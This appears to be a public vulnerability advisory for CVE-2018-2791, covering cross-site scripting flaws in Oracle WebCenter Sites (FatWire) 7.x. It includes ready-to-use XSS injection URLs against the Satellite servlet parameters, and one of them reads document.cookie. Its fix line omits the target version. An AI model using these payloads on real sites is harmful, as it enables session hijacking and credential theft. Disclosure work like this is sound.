Oracle WebCenter (Fatwire) 7.x Cross Site Scripting

`# Application: Oracle WebCenter Sites (FatWire Content Server)  
# Versions Affected: 7.x < 11gR1  
# Vendor URL: http://oracle.com  
# Bugs: Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x <  
11gR1  
# Sent: 18.12.2017  
# Reported: 18.12.2017  
# Date of Public Advisory: 14.04.2018  
# Reference: Oracle Security Note S0932669  
# Author: Richard Alviarez (SIA Group)  
  
  
Description  
  
1. #+# ADVISORY INFORMATION  
  
Title: Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x <  
11gR1  
Advisory ID: S0932669  
Risk: High  
Date published: 15.04.2018  
Vendors contacted: Oracle  
  
  
2. #+# VULNERABILITY INFORMATION  
  
Class: Authorization  
Impact: Information leakage  
Remotely Exploitable: Yes  
Locally Exploitable: No  
CVE: CVE-2018-2791  
  
CVSS Information  
* CVSSv3 Base Score: 8.2  
* CVSS Vector: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N  
  
  
3. #+# VULNERABILITY DESCRIPTION  
  
The backend of the Content Server is prone to permanent and reflected  
Cross-Site Scripting attacks. The vulnerability can be used to include  
HTML- or JavaScript code to the affected web page. The code is executed  
in the browser of users if they visit the manipulated site.  
The vulnerability can be used to change the contents of the displayed  
site,  
redirect to other sites or steal user credentials. Additionally, Portal  
users are potential victims of browser exploits and JavaScript Trojans.  
  
  
  
4. #+# VULNERABLE PACKAGES  
  
Multiple XSS Oracle WebCenter Sites (FatWire Content Server) 7.x < 11gR1  
  
Other versions are probably affected too, but they were not checked.  
  
  
5. #+# SOLUTIONS AND WORKAROUNDS  
  
To fix the vulnerability, upgrade to version.  
  
  
6. #+# AUTHOR  
  
Richard Alviarez (SIA Group)  
  
  
7. #+# TECHNICAL DESCRIPTION  
  
A possible attacker can take advantage of the vulnerability to inject  
javascript code  
in order to perform several attack vectors, such as identity theft (cookie  
theft), redirection  
to malicious external sites, phishing attacks among others.  
  
  
Steps to exploit this vulnerability  
  
  
1. Open https://WEB/servlet/Satellite?c=Noticia&cid={ID}&pagename=  
OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=  
eee%22%3E%3Cscript%3Ealert(123)%3C/script%3E%3C  
<https://WEB/servlet/Satellite?c=Noticia&cid=%7BID%7D&pagename=OpenMarket/Gator/FlexibleAssets/AssetMaker/confirmmakeasset&cs_imagedir=eee%22%3E%3Cscript%3Ealert%28123%29%3C/script%3E%3C>  
  
Note: {ID} Change for ID to site example (1362484193835)  
  
Other vulnerable parameters:  
  
2. servlet/Satellite?c=Noticia&cid={ID}&pagename=OpenMarket/  
Gator/FlexibleAssets/AssetMaker/confirmmakeasset&  
cs_imagedir=eee"<scriptalert(document.cookie)</script  
  
  
3. servlet/Satellite?destpage="<h1xxx<scriptalert(1)</script&  
pagename=OpenMarket%2FXcelerate%2FUIFramework%2FLoginError  
  
  
  
#+# Collaborators  
  
- CuriositySec  
- Victor  
- Vis0r  
- Oxd0m7  
`